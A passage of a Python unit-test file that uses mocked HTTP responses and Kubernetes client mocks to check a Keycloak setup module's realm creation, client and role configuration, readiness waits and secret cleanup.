csr_mock.assert_called_once_with(kcs.SHASTA_REALM_NAME)\n\n    def test_wait_keycloak_ready_up_2_30(self):\n        gu_mock = self.useFixture(fixtures.MockPatchObject(\n            keycloak_setup.KeycloakSetup, '_get_uptime_ms'\n        )).mock\n        gu_mock.return_value = 150001\n        rt_mock = self.useFixture(fixtures.MockPatchObject(\n            keycloak_setup.KeycloakSetup, 'reset_keycloak_master_admin_session'\n        )).mock\n\n        kcs = keycloak_setup.KeycloakSetup()\n        kcs._wait_keycloak_ready()\n\n        gu_mock.assert_called_with()\n        self.assertEqual(6, gu_mock.call_count)\n        rt_mock.assert_called_once_with()\n\n    def test_wait_keycloak_ready_up_short(self):\n        gu_mock = self.useFixture(fixtures.MockPatchObject(\n            keycloak_setup.KeycloakSetup, '_get_uptime_ms'\n        )).mock\n        # First time through 
loop one of the responses is <2:30, next time\n # all are >2:30\n gu_mock.side_effect = [\n 1000, 150001, 150001, 150001, 150001, 150001,\n 150001, 150001, 150001, 150001, 150001, 150001,\n ]\n sleep_mock = self.useFixture(fixtures.MockPatchObject(\n keycloak_setup.time, 'sleep'\n )).mock\n rt_mock = self.useFixture(fixtures.MockPatchObject(\n keycloak_setup.KeycloakSetup, 'reset_keycloak_master_admin_session'\n )).mock\n\n kcs = keycloak_setup.KeycloakSetup()\n kcs._wait_keycloak_ready()\n\n gu_mock.assert_called_with()\n self.assertEqual(12, gu_mock.call_count)\n sleep_mock.assert_called_once_with((150000 - 1000) / 1000.0)\n rt_mock.assert_called_with()\n self.assertEqual(2, rt_mock.call_count)\n\n @responses.activate\n def test_get_uptime_ms(self):\n si_url = 'http://keycloak.services:8080/keycloak/admin/serverinfo'\n si_example_response = {\n 'systemInfo': {\n 'version': '9.0.0',\n 'serverTime': 'Fri May 15 19:12:50 GMT 2020',\n 'uptime': '1 day, 1 hour, 45 minutes, 48 seconds',\n 'uptimeMillis': 92748706,\n },\n # Other stuff we don't care about.\n }\n responses.add(responses.GET, si_url, json=si_example_response)\n\n kcs = keycloak_setup.KeycloakSetup()\n kcs._kc_master_admin_client_cache = requests.Session()\n\n result = kcs._get_uptime_ms()\n self.assertEqual(92748706, result)\n\n @responses.activate\n def test_create_realm(self):\n kcs = keycloak_setup.KeycloakSetup()\n kcs._kc_master_admin_client_cache = requests.Session()\n\n kc_realms_url = 'http://keycloak.services:8080/keycloak/admin/realms'\n responses.add(responses.POST, kc_realms_url, status=201, json={})\n\n kcs.create_realm(kcs.SHASTA_REALM_NAME)\n\n self.assertEqual(1, len(responses.calls))\n self.assertEqual(kc_realms_url, responses.calls[0].request.url)\n\n exp_req_body = {\n 'realm': 'shasta',\n 'enabled': True,\n 'ssoSessionIdleTimeout': 31536000,\n 'ssoSessionMaxLifespan': 31536000,\n 'accessTokenLifespan': 31536000,\n 'accessTokenLifespanForImplicitFlow': 31536000,\n 'roles': {'realm': [{'name': 'tenant-admin'}]},\n }\n self.assertEqual(\n exp_req_body, json.loads(responses.calls[0].request.body))\n\n @responses.activate\n def test_create_realm_fail(self):\n kcs = keycloak_setup.KeycloakSetup()\n kcs._kc_master_admin_client_cache = requests.Session()\n\n kc_realms_url = 'http://keycloak.services:8080/keycloak/admin/realms'\n responses.add(responses.POST, kc_realms_url, status=401, json={})\n\n self.assertRaises(Exception, kcs.create_realm, kcs.SHASTA_REALM_NAME)\n\n @responses.activate\n def test_calc_client_url_found(self):\n realm_url = 'http://keycloak.services:8080/keycloak/admin/realms/shasta'\n clients_url = f'{realm_url}/clients'\n fake_id = str(mock.sentinel.id)\n responses.add(responses.GET, clients_url, json=[{'id': fake_id}])\n\n kcs = keycloak_setup.KeycloakSetup()\n kcs._kc_master_admin_client_cache = requests.Session()\n fake_client_id = str(mock.sentinel.client_id)\n res = kcs.calc_client_url(fake_client_id)\n exp_client_url = f'{clients_url}/{fake_id}'\n self.assertEqual(exp_client_url, res)\n\n exp_query_url = f'{clients_url}?clientId={fake_client_id}'\n self.assertEqual(exp_query_url, responses.calls[0].request.url)\n\n @responses.activate\n def test_calc_client_url_not_found(self):\n realm_url = 'http://keycloak.services:8080/keycloak/admin/realms/shasta'\n clients_url = f'{realm_url}/clients'\n responses.add(responses.GET, clients_url, json=[])\n\n kcs = keycloak_setup.KeycloakSetup()\n kcs._kc_master_admin_client_cache = requests.Session()\n fake_client_id = str(mock.sentinel.client_id)\n res 
= kcs.calc_client_url(fake_client_id)\n self.assertIsNone(res)\n\n @responses.activate\n def test_calc_client_url_error(self):\n realm_url = 'http://keycloak.services:8080/keycloak/admin/realms/shasta'\n clients_url = f'{realm_url}/clients'\n responses.add(responses.GET, clients_url, status=500, json=[])\n\n kcs = keycloak_setup.KeycloakSetup()\n kcs._kc_master_admin_client_cache = requests.Session()\n fake_client_id = str(mock.sentinel.client_id)\n self.assertRaises(\n requests.exceptions.HTTPError, kcs.calc_client_url, fake_client_id)\n\n def test_cleanup_clients(self):\n cc_mock = self.useFixture(fixtures.MockPatchObject(\n keycloak_setup.KeycloakSetup, '_cleanup_client')).mock\n clients_to_cleanup = [str(mock.sentinel.client1)]\n kcs = keycloak_setup.KeycloakSetup(clients_to_cleanup=clients_to_cleanup)\n kcs._cleanup_clients()\n cc_mock.assert_called_once_with(str(mock.sentinel.client1))\n\n @responses.activate\n def test_cleanup_client_exists(self):\n ccu_mock = self.useFixture(fixtures.MockPatchObject(\n keycloak_setup.KeycloakSetup, 'calc_client_url')).mock\n fake_url = 'http://keycloak.services:8080/whatever'\n ccu_mock.return_value = fake_url\n\n responses.add(responses.DELETE, fake_url, status=204)\n\n kcs = keycloak_setup.KeycloakSetup()\n kcs._kc_master_admin_client_cache = requests.Session()\n fake_client_id = str(mock.sentinel.client_id)\n kcs._cleanup_client(fake_client_id)\n\n ccu_mock.assert_called_once_with(fake_client_id)\n self.assertEqual(1, len(responses.calls))\n\n def test_cleanup_client_not_found(self):\n ccu_mock = self.useFixture(fixtures.MockPatchObject(\n keycloak_setup.KeycloakSetup, 'calc_client_url')).mock\n ccu_mock.return_value = None\n kcs = keycloak_setup.KeycloakSetup()\n fake_client_id = str(mock.sentinel.client_id)\n kcs._cleanup_client(fake_client_id)\n ccu_mock.assert_called_once_with(fake_client_id)\n\n @responses.activate\n def test_cleanup_client_error(self):\n # When _cleanup_client is called and the delete operation fails\n # the error is ignored.\n ccu_mock = self.useFixture(fixtures.MockPatchObject(\n keycloak_setup.KeycloakSetup, 'calc_client_url')).mock\n fake_url = 'http://keycloak.services:8080/whatever'\n ccu_mock.return_value = fake_url\n\n responses.add(responses.DELETE, fake_url, status=500)\n\n kcs = keycloak_setup.KeycloakSetup()\n kcs._kc_master_admin_client_cache = requests.Session()\n fake_client_id = str(mock.sentinel.client_id)\n kcs._cleanup_client(fake_client_id)\n\n ccu_mock.assert_called_once_with(fake_client_id)\n self.assertEqual(1, len(responses.calls))\n\n def test_cleanup_secrets(self):\n cs_mock = self.useFixture(fixtures.MockPatchObject(\n keycloak_setup.KeycloakSetup, '_cleanup_secret')).mock\n fake_secret_name = str(mock.sentinel.secret_1)\n fake_secret_namespaces = [str(mock.sentinel.namespace1_1)]\n secrets_to_cleanup = [\n {\n 'name': fake_secret_name,\n 'namespaces': fake_secret_namespaces,\n },\n ]\n kcs = keycloak_setup.KeycloakSetup(secrets_to_cleanup=secrets_to_cleanup)\n kcs._cleanup_secrets()\n cs_mock.assert_called_once_with(fake_secret_name, fake_secret_namespaces)\n\n def test_cleanup_secret(self):\n ds_mock = self.useFixture(fixtures.MockPatchObject(\n keycloak_setup.KeycloakSetup, '_delete_secret')).mock\n kcs = keycloak_setup.KeycloakSetup()\n fake_secret_name = str(mock.sentinel.secret_1)\n fake_secret_namespace = str(mock.sentinel.namespace1_1)\n fake_secret_namespaces = [fake_secret_namespace]\n kcs._cleanup_secret(fake_secret_name, fake_secret_namespaces)\n 
ds_mock.assert_called_once_with(fake_secret_name, fake_secret_namespace)\n\n    def test_delete_secret_deleted(self):\n        kcs = keycloak_setup.KeycloakSetup()\n        k8s_corev1_mock = mock.Mock()\n        kcs._k8s_corev1_cache = k8s_corev1_mock\n        fake_secret_name = str(mock.sentinel.secret_1)\n        fake_namespace = str(mock.sentinel.namespace1_1)\n        kcs._delete_secret(fake_secret_name, fake_namespace)\n        k8s_corev1_mock.delete_namespaced_secret.assert_called_once_with(\n            fake_secret_name, fake_namespace)\n\n    def test_delete_secret_doesnt_exist(self):\n        # If the secret already doesn't exist, that's ignored.\n        kcs = keycloak_setup.KeycloakSetup()\n        k8s_corev1_mock = mock.Mock()\n        k8s_corev1_mock.delete_namespaced_secret.side_effect = rest.ApiException(404)\n        kcs._k8s_corev1_cache = k8s_corev1_mock\n        fake_secret_name = str(mock.sentinel.secret_1)\n        fake_namespace = str(mock.sentinel.namespace1_1)\n        kcs._delete_secret(fake_secret_name, fake_namespace)\n\n    def test_delete_secret_fails(self):\n        # If there's another error deleting the secret it's re-raised.\n        kcs = keycloak_setup.KeycloakSetup()\n        k8s_corev1_mock = mock.Mock()\n        k8s_corev1_mock.delete_namespaced_secret.side_effect = rest.ApiException(403)\n        kcs._k8s_corev1_cache = k8s_corev1_mock\n        fake_secret_name = str(mock.sentinel.secret_1)\n        fake_namespace = str(mock.sentinel.namespace1_1)\n        self.assertRaises(\n            rest.ApiException, kcs._delete_secret, fake_secret_name, fake_namespace)\n\n    def test_client_input_validation(self):\n\n        \"\"\"Test input validation for the KeycloakClient class\"\"\"\n\n        kcs = keycloak_setup.KeycloakSetup()\n\n        # -----------------------------------------------------------\n        # Type checking\n        # -----------------------------------------------------------\n\n        # bad keycloak setup type\n        self.assertRaises(TypeError,\n                          keycloak_setup.KeycloakClient,\n                          None,\n                          kcs.SHASTA_REALM_NAME,\n                          'test')\n        # bad realm type\n        self.assertRaises(TypeError,\n                          keycloak_setup.KeycloakClient,\n                          kcs,\n                          None,\n                          'test')\n        # bad client type\n        self.assertRaises(TypeError,\n                          keycloak_setup.KeycloakClient,\n                          kcs,\n                          kcs.SHASTA_REALM_NAME,\n                          None)\n        # bad k8s secret name type\n        self.assertRaises(TypeError,\n                          keycloak_setup.KeycloakClient,\n                          kcs,\n                          kcs.SHASTA_REALM_NAME,\n                          'test',\n                          0)\n        # bad k8s secret namespace type\n        self.assertRaises(TypeError,\n                          keycloak_setup.KeycloakClient,\n                          kcs,\n                          kcs.SHASTA_REALM_NAME,\n                          'test',\n                          'test-secret-name',\n                          0)\n\n        # bad k8s secret namespace element\n        self.assertRaises(TypeError,\n                          keycloak_setup.KeycloakClient,\n                          kcs,\n                          kcs.SHASTA_REALM_NAME,\n                          'test',\n                          'test-secret-name',\n                          [0])\n\n        # -----------------------------------------------------------\n        # Value checking\n        # -----------------------------------------------------------\n\n        # bad realm\n        self.assertRaises(ValueError,\n                          keycloak_setup.KeycloakClient,\n                          kcs,\n                          '\\t',\n                          'test')\n\n        # bad user\n        self.assertRaises(ValueError,\n                          keycloak_setup.KeycloakClient,\n                          kcs,\n                          'test',\n                          '\\t')\n\n        # bad k8s secret name\n        self.assertRaises(ValueError,\n                          keycloak_setup.KeycloakClient,\n                          kcs,\n                          kcs.SHASTA_REALM_NAME,\n                          'test',\n                          'bad_secret_name',\n                          ['test'])\n        # bad k8s secret namespace\n        self.assertRaises(ValueError,\n                          keycloak_setup.KeycloakClient,\n                          kcs,\n                          kcs.SHASTA_REALM_NAME,\n                          'test',\n                          'test',\n                          ['bad_namespace'])\n        # k8s secret name set to None, namespaces not\n        self.assertRaises(ValueError,\n                          
keycloak_setup.KeycloakClient,\n                          kcs,\n                          kcs.SHASTA_REALM_NAME,\n                          'test',\n                          None,\n                          ['test'])\n        # k8s secret namespaces set to None, name not\n        self.assertRaises(ValueError,\n                          keycloak_setup.KeycloakClient,\n                          kcs,\n                          kcs.SHASTA_REALM_NAME,\n                          'test',\n                          'test',\n                          None)\n\n        # test attempt to create secret with no name set (should be no op)\n\n        c = keycloak_setup.KeycloakClient(kcs, 'test', 'test')\n        c.create_k8s_secrets()\n\n        # test attempt to create secret without first creating client\n        c = keycloak_setup.KeycloakClient(kcs, 'test', 'test', 'secret-name', ['test'])\n        self.assertRaises(ValueError, c.create_k8s_secrets)\n\n        # validate defaults\n        c = keycloak_setup.KeycloakClient(kcs, 'test', 'test', 'secret-name', ['test'])\n        self.assertFalse(c.standard_flow_enabled)\n        self.assertFalse(c.implicit_flow_enabled)\n        self.assertFalse(c.direct_access_grants_enabled)\n        self.assertFalse(c.service_accounts_enabled)\n        self.assertFalse(c.public_client)\n\n        # validate unable to set properties to bad type\n        # then good bool value\n        for p in ('public_client',\n                  'service_accounts_enabled',\n                  'direct_access_grants_enabled',\n                  'implicit_flow_enabled',\n                  'standard_flow_enabled'):\n\n            self.assertRaises(TypeError,\n                              setattr,\n                              c,\n                              p,\n                              None)\n\n            setattr(c, p, True)\n\n        self.assertTrue(c.standard_flow_enabled)\n        self.assertTrue(c.implicit_flow_enabled)\n        self.assertTrue(c.direct_access_grants_enabled)\n        self.assertTrue(c.service_accounts_enabled)\n        self.assertTrue(c.public_client)\n\n        # test role assignment type and value errors\n        self.assertRaises(TypeError,\n                          c.create_role,\n                          None)\n\n        self.assertRaises(ValueError,\n                          c.create_role,\n                          '\\t')\n\n        # client URL is not set before create\n        self.assertRaises(ValueError,\n                          c.create_role,\n                          'test')\n\n        # create collision for core attributes (keycloak)\n        c.set_req_attr('implicitFlowEnabled', False)\n        self.assertRaises(ValueError, c.create)\n\n        # create collision for core K8S secret attributes\n        c.set_k8s_secret_attr('client-id', 'foo')\n        self.assertRaises(ValueError, c.create_k8s_secrets)\n\n        # validate type checking when setting client_roles\n        self.assertRaises(TypeError, setattr, c, 'client_roles', None)\n        self.assertRaises(TypeError, setattr, c, 'client_roles', [None])\n        c.client_roles = ['role1']\n        self.assertEqual(['role1'], c.client_roles)\n\n        # validate type checking when setting authorization_services_enabled\n        self.assertRaises(TypeError, setattr, c, 'authorization_services_enabled', None)\n        c.authorization_services_enabled = True\n        self.assertTrue(c.authorization_services_enabled)\n\n    @responses.activate\n    def test_create_client(self):\n\n        \"\"\"Test non-public client creation\"\"\"\n\n        kc_base = 'http://keycloak.services:8080/keycloak'\n\n        # initial client create call\n        kc_clients_url = '{}/admin/realms/shasta/clients'.format(kc_base)\n        responses.add(\n            responses.POST, kc_clients_url, status=201, json={},\n            headers={'location': str(mock.sentinel.location)})\n\n        kcs = keycloak_setup.KeycloakSetup()\n        kcs._kc_master_admin_client_cache = requests.Session()\n\n        # mock k8s_apply_secret, tested elsewhere\n\n        k8s_secret_create_mock = self.useFixture(fixtures.MockPatchObject(\n            keycloak_setup, 'k8s_apply_secret'\n        )).mock\n\n        # create client and request properties\n        client = keycloak_setup.KeycloakClient(kcs,\n                                               kcs.SHASTA_REALM_NAME,\n                                               'test_client',\n                                               'test-k8s-secret-name',\n                                               ['test-k8s-secret-namespace']\n                                               )\n\n        client.direct_access_grants_enabled = True\n        client.service_accounts_enabled = True\n\n        # use dummy values for client.id for audience mapping\n        client_pm = \\\n            [\n                {\n                    'name': 'admin-role',\n                    'protocol': 'openid-connect',\n                    'protocolMapper': 'oidc-hardcoded-role-mapper',\n                    'consentRequired': False,\n                    'config': {\n                        'role': 'shasta.admin',\n                    },\n                },\n                {\n                    'name': '{}-aud-mapper'.format(client.id),\n                    'protocolMapper': 'oidc-audience-mapper',\n                    'protocol': 'openid-connect',\n                    'config': {\n                        'included.client.audience': client.id,\n                        'id.token.claim': False,\n                        'access.token.claim': True,\n                    },\n                },\n            ]\n\n        client.set_req_attr('protocolMappers', client_pm)\n\n        # call to get keycloak ID\n        kc_clients_uuid_url = f'{kc_clients_url}?clientId={client.id}'\n        responses.add(\n            responses.GET, kc_clients_uuid_url, status=200, json=[{'id': \"12345\"}])\n\n        # call to get keycloak client secret, using 12345 as keycloak id\n        kc_clients_secret_url = f'{kc_base}/admin/realms/shasta/clients/12345/client-secret'\n        responses.add(\n            responses.GET, kc_clients_secret_url, status=200, json={'value': \"secret\"})\n\n        # Get the service account user for the client\n        kc_clients_user_url = f'{kc_base}/admin/realms/shasta/users?username=service-account-test_client'\n        responses.add(\n            responses.GET, kc_clients_user_url, status=200, json=[{'id': \"dummy-client-uuid\", 'username': \"service-account-test_client\"}])\n\n        # Get the client ID\n        kc_clients_realm_mgmt_url = f'{kc_base}/admin/realms/shasta/clients?clientId=realm-management'\n        responses.add(\n            responses.GET, kc_clients_realm_mgmt_url, status=200, json=[{'id': \"dummy-client-realm-mgmt-uuid\"}])\n\n        # Get the client role ID\n        kc_realm_mgmt_roles_url = f'{kc_base}/admin/realms/shasta/clients/dummy-client-realm-mgmt-uuid/roles/view-clients'\n        responses.add(\n            responses.GET, kc_realm_mgmt_roles_url, status=200, json={'id': 'id', 'name': 'view-clients', 'clientRole': True})\n\n        # Post the client role list to the users endpoint\n        kc_user_role_map_url = f'{kc_base}/admin/realms/shasta/users/dummy-client-uuid/role-mappings/clients/dummy-client-realm-mgmt-uuid'\n        responses.add(\n            responses.POST, kc_user_role_map_url, status=204, json={})\n\n        # Request adding a service account role\n        client._service_account_client_roles = {\"realm-management\": [\"view-clients\"]}\n\n        # Test create and create_k8s_secrets\n        client.create()\n        client.create_k8s_secrets()\n\n        k8s_secret_create_mock.assert_called_with(client.k8s_secret_namespaces[0],\n                                                  client.k8s_secret_name,\n                                                  {'client-id': client.id, 'client-secret': 'secret'})\n\n        # verify calls, there should be:\n        # - one to create client\n        # - one to get the keycloak ID for client\n        # - one to get the keycloak secret for the client\n        # Additional calls are for the purpose of adding a client role as noted above.\n\n        self.assertEqual(7, len(responses.calls))\n        self.assertEqual(kc_clients_url, responses.calls[0].request.url)\n\n        exp_req_body = {\n            'authorizationServicesEnabled': False,\n            'clientId': client.id,\n            'standardFlowEnabled': False,\n            'implicitFlowEnabled': False,\n            'directAccessGrantsEnabled': True,\n            'serviceAccountsEnabled': True,\n            'publicClient': False,\n            'protocolMappers': client_pm\n        }\n        self.assertEqual(\n            exp_req_body, json.loads(responses.calls[0].request.body))\n\n        self.assertEqual(kc_clients_uuid_url, responses.calls[1].request.url)\n        self.assertEqual(kc_clients_user_url, responses.calls[2].request.url)\n        self.assertEqual(kc_clients_realm_mgmt_url, responses.calls[3].request.url)\n        self.assertEqual(kc_realm_mgmt_roles_url, responses.calls[4].request.url)\n        self.assertEqual(kc_user_role_map_url, responses.calls[5].request.url)\n        self.assertEqual(kc_clients_secret_url, responses.calls[6].request.url)\n\n    @responses.activate\n    def test_create_client_fail(self):\n\n        \"\"\"Test non-public client creation failure\"\"\"\n\n        kc_base = 'http://keycloak.services:8080/keycloak'\n\n        # initial client create call, forced to 401 status\n        kc_clients_url = '{}/admin/realms/shasta/clients'.format(kc_base)\n        responses.add(\n            responses.POST, kc_clients_url, status=401, json={},\n            headers={'location': str(mock.sentinel.location)})\n\n        kcs = keycloak_setup.KeycloakSetup()\n        kcs._kc_master_admin_client_cache = requests.Session()\n\n        client = keycloak_setup.KeycloakClient(kcs,\n                                               kcs.SHASTA_REALM_NAME,\n                                               'test_client')\n\n        client.direct_access_grants_enabled = True\n        client.service_accounts_enabled = True\n\n        # Test create and create_k8s_secrets\n        self.assertRaises(Exception, client.create)\n\n    @responses.activate\n    def test_create_client_service_acct_role_fail(self):\n\n        \"\"\"Test handling when assigning a service account role fails during client creation\"\"\"\n\n        kc_base = 'http://keycloak.services:8080/keycloak'\n\n        # initial client create call\n        kc_clients_url = '{}/admin/realms/shasta/clients'.format(kc_base)\n        responses.add(\n            responses.POST, kc_clients_url, status=201, json={},\n            headers={'location': str(mock.sentinel.location)})\n\n        kcs = keycloak_setup.KeycloakSetup()\n        kcs._kc_master_admin_client_cache = requests.Session()\n\n        # create client and request properties\n        client = keycloak_setup.KeycloakClient(kcs,\n                                               kcs.SHASTA_REALM_NAME,\n                                               'test_client',\n                                               'test-k8s-secret-name',\n                                               ['test-k8s-secret-namespace']\n                                               )\n        # Mock call to get keycloak ID\n        kc_clients_uuid_url = kc_clients_url + \"?clientId=\" + client.id\n        responses.add(\n            responses.GET, kc_clients_uuid_url, status=200, json=[{'id': \"12345\"}])\n\n        # Mock the case where a service account user for the client was not found.\n        # This will return a 200 response and an empty list.\n        kc_clients_user_url = f'{kc_base}/admin/realms/shasta/users?username=service-account-test_client'\n        responses.add(\n            responses.GET, kc_clients_user_url, status=200, json=[])\n\n        # Request adding a service account role\n        client._service_account_client_roles = {\"realm-management\": [\"view-clients\"]}\n        client.create()\n\n        # Verify the expected number of API calls.\n        self.assertEqual(3, len(responses.calls))\n\n        # Test the handling when the client is not found.\n        # Update the previous mock so that it will return the expected result.\n        responses.replace(\n            responses.GET, kc_clients_user_url, status=200,\n            json=[{'id': \"test_client-uuid\", 'username': \"service-account-test_client\"}])\n\n        # Mock the case where the client ID can not be found from the client name.\n        kc_clients_realm_mgmt_url = f'{kc_base}/admin/realms/shasta/clients?clientId=realm-management'\n        responses.add(\n            responses.GET, kc_clients_realm_mgmt_url, status=200,\n            json=[])\n\n        client.create()\n        self.assertEqual(3 + 4, len(responses.calls))  # Expecting 4 new calls for this test\n\n    @responses.activate\n    def test_create_public_client(self):\n\n        \"\"\"Test public client create with role assignment\"\"\"\n\n        kc_base = 'http://keycloak.services:8080/keycloak'\n\n        # initial client create call\n        kc_clients_url = '{}/admin/realms/shasta/clients'.format(kc_base)\n\n        kcs = keycloak_setup.KeycloakSetup()\n        kcs._kc_master_admin_client_cache = requests.Session()\n\n        client = keycloak_setup.KeycloakClient(kcs,\n                                               kcs.SHASTA_REALM_NAME,\n                                               'test_client')\n\n        client.public_client = True\n        client.direct_access_grants_enabled = True\n\n        # use dummy values for client.id for audience mapping\n        client_pm = \\\n            [\n                {\n                    'name': 
'uid-user-attribute-mapper',\n 'protocolMapper': 'oidc-usermodel-attribute-mapper',\n 'protocol': 'openid-connect',\n 'config': {\n 'user.attribute': 'uidNumber',\n 'claim.name': 'uidNumber',\n 'id.token.claim': True,\n 'access.token.claim': False,\n 'userinfo.token.claim': True,\n },\n },\n {\n 'name': 'gid-user-attribute-mapper',\n 'protocolMapper': 'oidc-usermodel-attribute-mapper',\n 'protocol': 'openid-connect',\n 'config': {\n 'user.attribute': 'gidNumber',\n 'claim.name': 'gidNumber',\n 'id.token.claim': True,\n 'access.token.claim': False,\n 'userinfo.token.claim': True,\n },\n },\n {\n 'name': 'loginshell-user-attribute-mapper',\n 'protocolMapper': 'oidc-usermodel-attribute-mapper',\n 'protocol': 'openid-connect',\n 'config': {\n 'user.attribute': 'loginShell',\n 'claim.name': 'loginShell',\n 'id.token.claim': True,\n 'access.token.claim': False,\n 'userinfo.token.claim': True,\n },\n },\n {\n 'name': 'homedirectory-user-attribute-mapper',\n 'protocolMapper': 'oidc-usermodel-attribute-mapper',\n 'protocol': 'openid-connect',\n 'config': {\n 'user.attribute': 'homeDirectory',\n 'claim.name': 'homeDirectory',\n 'id.token.claim': True,\n 'access.token.claim': False,\n 'userinfo.token.claim': True,\n },\n },\n {\n 'name': '{}-aud-mapper'.format(client.id),\n 'protocolMapper': 'oidc-audience-mapper',\n 'protocol': 'openid-connect',\n 'config': {\n 'included.client.audience': client.id,\n 'id.token.claim': True,\n 'access.token.claim': True,\n },\n },\n {\n 'name': '{}-aud-mapper'.format(client.id),\n 'protocolMapper': 'oidc-audience-mapper',\n 'protocol': 'openid-connect',\n 'config': {\n 'included.client.audience': client.id,\n 'id.token.claim': False,\n 'access.token.claim': True,\n },\n },\n ]\n\n client.set_req_attr('protocolMappers', client_pm)\n\n # call for initial client create\n responses.add(\n responses.POST, kc_clients_url, status=201, json={},\n headers={'location': '{}/admin/realms/shasta/clients/{}'.format(kc_base, client.id)})\n\n # call to get keycloak id\n kc_clients_uuid_url = kc_clients_url + \"?clientId=\" + client.id\n responses.add(\n responses.GET, kc_clients_uuid_url, status=200, json=[{'id': \"12345\"}],\n headers={'location': str(mock.sentinel.location)})\n\n # call to set roles\n kc_roles_url = '{}/admin/realms/shasta/clients/{}/roles'.format(kc_base, \"12345\")\n responses.add(responses.POST, kc_roles_url, status=201, json={})\n\n # Test create\n client.create()\n\n # verify first call to create client\n exp_req_body = {\n 'authorizationServicesEnabled': False,\n 'clientId': client.id,\n 'standardFlowEnabled': False,\n 'implicitFlowEnabled': False,\n 'directAccessGrantsEnabled': True,\n 'serviceAccountsEnabled': False,\n 'publicClient': True,\n 'protocolMappers': client_pm\n }\n self.assertEqual(\n exp_req_body, json.loads(responses.calls[0].request.body))\n self.assertEqual(kc_clients_url, responses.calls[0].request.url)\n self.assertEqual(kc_clients_uuid_url, responses.calls[1].request.url)\n\n # Test role creation\n client.create_role('user')\n client.create_role('admin')\n client.create_role('monitor-ro')\n\n # verify overall call count\n self.assertEqual(5, len(responses.calls))\n\n # Verify calls to create roles\n exp_req_body = {'name': 'user'}\n self.assertEqual(exp_req_body, json.loads(responses.calls[2].request.body))\n exp_req_body = {'name': 'admin'}\n self.assertEqual(exp_req_body, json.loads(responses.calls[3].request.body))\n exp_req_body = {'name': 'monitor-ro'}\n self.assertEqual(exp_req_body, 
json.loads(responses.calls[4].request.body))\n\n @responses.activate\n def test_create_role_already_exists(self):\n \"\"\"Test client create with role assignment, where role exists\"\"\"\n\n kc_base = 'http://keycloak.services:8080/keycloak'\n\n # initial client create call\n kc_clients_url = '{}/admin/realms/shasta/clients'.format(kc_base)\n\n kcs = keycloak_setup.KeycloakSetup()\n kcs._kc_master_admin_client_cache = requests.Session()\n\n client = keycloak_setup.KeycloakClient(kcs,\n kcs.SHASTA_REALM_NAME,\n 'test_client')\n\n responses.add(\n responses.POST, kc_clients_url, status=201, json={},\n headers={'location': '{}/admin/realms/shasta/clients/{}'.format(kc_base, client.id)})\n\n # call to get keycloak id\n kc_clients_uuid_url = kc_clients_url + \"?clientId=\" + client.id\n responses.add(\n responses.GET, kc_clients_uuid_url, status=200, json=[{'id': \"12345\"}],\n headers={'location': str(mock.sentinel.location)})\n\n # call to create role(s)\n kc_roles_url = '{}/admin/realms/shasta/clients/{}/roles'.format(kc_base, \"12345\")\n responses.add(responses.POST, kc_roles_url, status=409, json={})\n\n client.create()\n self.assertEqual(kc_clients_url, responses.calls[0].request.url)\n self.assertEqual(kc_clients_uuid_url, responses.calls[1].request.url)\n\n client.create_role(\"user\")\n self.assertEqual(3, len(responses.calls))\n self.assertEqual(kc_roles_url, responses.calls[2].request.url)\n\n @responses.activate\n def test_create_role_fails(self):\n \"\"\"Test client create with role assignment, where the role assignment fails\"\"\"\n\n kc_base = 'http://keycloak.services:8080/keycloak'\n\n # initial client create call\n kc_clients_url = '{}/admin/realms/shasta/clients'.format(kc_base)\n\n kcs = keycloak_setup.KeycloakSetup()\n kcs._kc_master_admin_client_cache = requests.Session()\n\n client = keycloak_setup.KeycloakClient(kcs,\n kcs.SHASTA_REALM_NAME,\n 'test_client')\n\n responses.add(\n responses.POST, kc_clients_url, status=201, json={},\n headers={'location': '{}/admin/realms/shasta/clients/{}'.format(kc_base, client.id)})\n\n # call to get keycloak id\n kc_clients_uuid_url = kc_clients_url + \"?clientId=\" + client.id\n responses.add(\n responses.GET, kc_clients_uuid_url, status=200, json=[{'id': \"12345\"}],\n headers={'location': str(mock.sentinel.location)})\n\n # call to create roles\n kc_roles_url = '{}/admin/realms/shasta/clients/{}/roles'.format(kc_base, \"12345\")\n\n responses.add(responses.POST, kc_roles_url, status=404, json={})\n\n client.create()\n\n self.assertRaises(\n Exception, client.create_role, \"user\")\n\n @responses.activate\n def test_create_client_exists(self):\n\n kcs = keycloak_setup.KeycloakSetup()\n kcs._kc_master_admin_client_cache = requests.Session()\n\n kc_base = 'http://keycloak.services:8080/keycloak'\n kc_clients_url = '{}/admin/realms/{}/clients'.format(kc_base, kcs.SHASTA_REALM_NAME)\n responses.add(\n responses.POST, kc_clients_url, status=409, json={})\n\n client = keycloak_setup.KeycloakClient(kcs,\n kcs.SHASTA_REALM_NAME,\n 'test')\n\n # call to get keycloak id\n kc_clients_uuid_url = kc_clients_url + \"?clientId=\" + client.id\n responses.add(\n responses.GET, kc_clients_uuid_url, status=200, json=[{'id': \"12345\"}],\n headers={'location': str(mock.sentinel.location)})\n\n client.create()\n\n self.assertEqual(2, len(responses.calls))\n self.assertEqual(kc_clients_url, responses.calls[0].request.url)\n self.assertEqual(kc_clients_uuid_url, responses.calls[1].request.url)\n\n @responses.activate\n def 
test_create_client_fails(self):\n kc_base = 'http://keycloak.services:8080/keycloak'\n kc_clients_url = '{}/admin/realms/shasta/clients'.format(kc_base)\n responses.add(\n responses.POST, kc_clients_url, status=401, json={})\n\n kcs = keycloak_setup.KeycloakSetup()\n kcs._kc_master_admin_client_cache = requests.Session()\n\n client = keycloak_setup.KeycloakClient(kcs,\n 'test',\n 'test')\n\n self.assertRaises(Exception, client.create)\n\n def test_create_keycloak_client_from_spec_minimal(self):\n client_id = str(mock.sentinel.client_id)\n min_spec = {} # All of the keys are optional.\n kcs = keycloak_setup.KeycloakSetup()\n customer_access_url = str(mock.sentinel.customer_access_url)\n res = keycloak_setup.create_keycloak_client_from_spec(\n client_id, min_spec, kcs, customer_access_url)\n self.assertEqual(kcs, res.kas)\n self.assertEqual(kcs.SHASTA_REALM_NAME, res.realm)\n self.assertEqual(client_id, res.id)\n self.assertIsNone(res.k8s_secret_name)\n self.assertIsNone(res.k8s_secret_namespaces)\n self.assertEqual({}, res._k8s_secret_ext_attr)\n self.assertIs(res.standard_flow_enabled, False)\n self.assertIs(res.implicit_flow_enabled, False)\n self.assertIs(res.direct_access_grants_enabled, False)\n self.assertIs(res.service_accounts_enabled, False)\n self.assertIs(res.authorization_services_enabled, False)\n self.assertIs(res.public_client, False)\n self.assertEqual({}, res._kc_ext_attr)\n\n def 